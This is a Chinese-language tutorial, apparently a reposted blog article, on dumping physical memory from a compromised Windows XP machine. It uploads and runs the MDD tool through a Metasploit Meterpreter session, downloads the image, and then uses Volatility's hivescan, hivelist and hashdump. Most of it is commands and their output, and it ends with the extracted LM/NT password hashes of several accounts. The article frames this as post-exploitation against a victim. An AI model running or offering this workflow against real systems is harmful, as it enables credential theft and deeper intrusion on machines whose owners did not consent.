ManTech MDD(http://www.mantech.com/msma/MDD.asp)是遵循GPL协议发布的,MDD可以复制以下微软操作系统内存的所有内容:WINDOWS 2000, Windows XP, Windows 2003 Server, Windows 2008 Server。
从ManTech网站下载MDD后,你必须使用命令行来运行MDD程序。
MDD命令行用法
mdd -o 输出文件名
例如:
C:toolsmdd> mdd -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> Dumping 255.48 MB of physical memory to file 'memory.dd'.
65404 map operations succeeded (1.00)
0 map operations failed
took 21 seconds to write
MD5 is: a48986bb0558498684414e9399ca19fc
输出文件通常都会涉及镜像,MDD的功能仅限于复制物理内存,所以必须利用其他工具来分析内存镜像。
这里我们使用Metasploit Meterpreter和MDD共同来完成下面的工作。
首先需要更新MDD。
meterpreter > upload /root/mdd.exe .
[*] uploading : /root/mdd.exe -> .
[*] uploaded : /root/mdd.exe -> .mdd.exe
meterpreter > ls
Listing: c:
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777 /rwxrwxrwx 0 fil Thu Jan 01 00:00:00 +0000 1970 AUTOEXEC.BAT
100666 /rw-rw-rw- 0 fil Thu Jan 01 00:00:00 +0000 1970 CONFIG.SYS
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 Documents and Settings
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 IO.SYS
100444 /r--r--r-- 0 fil Thu Jan 01 00:00:00 +0000 1970 MSDOS.SYS
100555 /r-xr-xr-x 45124 fil Thu Jan 01 00:00:00 +0000 1970 NTDETECT.COM
40555 /r-xr-xr-x 0 dir Thu Jan 01 00:00:00 +0000 1970 Program Files
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 System Volume Information
40777 /rwxrwxrwx 0 dir Thu Jan 01 00:00:00 +0000 1970 WINDOWS
100666 /rw-rw-rw- 194 fil Thu Jan 01 00:00:00 +0000 1970 boot.ini
100777 /rwxrwxrwx 95104 fil Thu Jan 01 00:00:00 +0000 1970 mdd.exe
100444 /r--r--r-- 222368 fil Thu Jan 01 00:00:00 +0000 1970 ntldr
100666 /rw-rw-rw- 402653184 fil Thu Jan 01 00:00:00 +0000 1970 pagefile.sys
在被攻击者的机器上执行MDD来获得RAM信息
meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:> mdd.exe -o memory.dd
mdd.exe -o memory.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> Dumping 511.48 MB of physical memory to file 'memory.dd'.
130940 map operations succeeded (1.00)
0 map operations failed
took 23 seconds to write
MD5 is: be9d1d906fac99fa01782e847a1c3144
这里,我们只需要毫不费力的运行工具,所需的数据将会被捕获下来。
meterpreter > execute -f mdd.exe -a "-o demo.dd"
Process 3436 created.
我们需要证实内存镜像已被捕获。
meterpreter > ls
Listing: C:
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 537604934 fil Wed Dec 31 19:00:00 -0500 1969 92010NT_Disk2.zip
100777/rwxrwxrwx 0 fil Wed Dec 31 19:00:00 -0500 1969 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Wed Dec 31 19:00:00 -0500 1969 CONFIG.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Config.Msi
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Documents and Settings
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 GetAd2
100666/rw-rw-rw- 15642 fil Wed Dec 31 19:00:00 -0500 1969 GetAd2.zip
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 IO.SYS
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 Inetpub
100444/r--r--r-- 0 fil Wed Dec 31 19:00:00 -0500 1969 MSDOS.SYS
100555/r-xr-xr-x 47580 fil Wed Dec 31 19:00:00 -0500 1969 NTDETECT.COM
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 PortQryV2
40555/r-xr-xr-x 0 dir Wed Dec 31 19:00:00 -0500 1969 Program Files
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 RECYCLER
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 System Volume Information
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 WINDOWS
100666/rw-rw-rw- 146 fil Wed Dec 31 19:00:00 -0500 1969 YServer.txt
100666/rw-rw-rw- 194 fil Wed Dec 31 19:00:00 -0500 1969 boot.ini
100666/rw-rw-rw- 133677056 fil Wed Dec 31 19:00:00 -0500 1969 demo.dd
100777/rwxrwxrwx 95104 fil Wed Dec 31 19:00:00 -0500 1969 mdd.exe
100444/r--r--r-- 233632 fil Wed Dec 31 19:00:00 -0500 1969 ntldr
100666/rw-rw-rw- 402653184 fil Wed Dec 31 19:00:00 -0500 1969 pagefile.sys
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 passwordcrackers#p#
40777/rwxrwxrwx 0 dir Wed Dec 31 19:00:00 -0500 1969 share
100777/rwxrwxrwx 869 fil Wed Dec 31 19:00:00 -0500 1969 update.exe
Download memory dump using Meterpreter.
meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./demo.dd
meterpreter >
我们已得到了.dd的本地映像,现在就可以利用http://forensiczone.blogspot.com/2009/01/using-volatility-1.html提供的操作步骤来获取内存中的敏感信息。
附:
Volatility(https://www.volatilesystems.com/default/volatility)
$python volatility
Volatile Systems Volatility Framework v1.3
Copyright (C) 2007,2008 Volatile Systems
Copyright (C) 2007 Komoku, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
usage: volatility cmd [cmd_opts]
Run command cmd with options cmd_opts
For help on a specific command, run 'volatility cmd --help'
Supported Internel Commands:
connections Print list of open connections
connscan Scan for connection objects
connscan2 Scan for connection objects (New)
datetime Get date/time information for image
dlllist Print list of loaded dlls for each process
dmp2raw Convert a crash dump to a raw dump
dmpchk Dump crash dump information
files Print list of open files for each process
hibinfo Convert hibernation file to linear raw image
ident Identify image properties
memdmp Dump the addressable memory for a process
memmap Print the memory map
modscan Scan for modules
modscan2 Scan for module objects (New)
modules Print list of loaded modules
procdump Dump a process to an executable sample
pslist Print list of running processes
psscan Scan for EPROCESS objects
psscan2 Scan for process objects (New)
raw2dmp Convert a raw dump to a crash dump
regobjkeys Print list of open regkeys for each process
sockets Print list of open sockets
sockscan Scan for socket objects
sockscan2 Scan for socket objects (New)
strings Match physical offsets to virtual addresses (may take a while, VERY verbose)
thrdscan Scan for ETHREAD objects
thrdscan2 Scan for thread objects (New)
vaddump Dump the Vad sections to files
vadinfo Dump the VAD info
vadwalk Walk the vad tree
Supported Plugin Commands:
cachedump Dump (decrypted) domain hashes from the registry
hashdump Dump (decrypted) LM and NT hashes from the registry
hivelist Print list of registry hives
hivescan Scan for _CMHIVE objects (registry hives)
lsadump Dump (decrypted) LSA secrets from the registry
memmap_ex_2 Print the memory map
printkey Print a registry key, and its subkeys and values
pslist_ex_1 Print list running processes
pslist_ex_3 Print list running processes
usrdmp_ex_2 Dump the address space for a process
Example: volatility pslist -f /path/to/my/file
1. 运行hivescan得到所需偏移量
$ python volatility hivescan -f demo.dd
Offset (hex)
42168328 0x2837008
42195808 0x283db60
47598392 0x2d64b38
155764592 0x948c770
155973608 0x94bf7e8
208587616 0xc6ecb60
208964448 0xc748b60
234838880 0xdff5b60
243852936 0xe88e688
251418760 0xefc5888
252887048 0xf12c008
256039736 0xf42db38
269699936 0x10134b60
339523208 0x143cb688
346659680 0x14a99b60
377572192 0x16814b60
387192184 0x17141578
509150856 0x1e590688
521194336 0x1f10cb60
523667592 0x1f368888
527756088 0x1f74eb38
2. 运行hivelist
$ python volatility hivelist -f demo.dd -o 0x2837008
Address Name
0xe2610b60 Documents and SettingsSarahLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe25f0578 Documents and SettingsSarahNTUSER.DAT
0xe1d33008 Documents and SettingsLocalServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe1c73888 Documents and SettingsLocalServiceNTUSER.DAT
0xe1c04688 Documents and SettingsNetworkServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat
0xe1b70b60 Documents and SettingsNetworkServiceNTUSER.DAT
0xe1658b60 WINDOWSsystem32configsoftware
0xe1a5a7e8 WINDOWSsystem32configdefault
0xe165cb60 WINDOWSsystem32configSAM
0xe1a4f770 WINDOWSsystem32configSECURITY
0xe1559b38 [no name]
0xe1035b60 WINDOWSsystem32configsystem
0xe102e008 [no name]
3. Password Hash (-y System Hive Offset)(-s SAM Hive
$ python volatility hashdump -f demo.dd -y 0xe1035b60 -s 0xe165cb60
Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
【编辑推荐】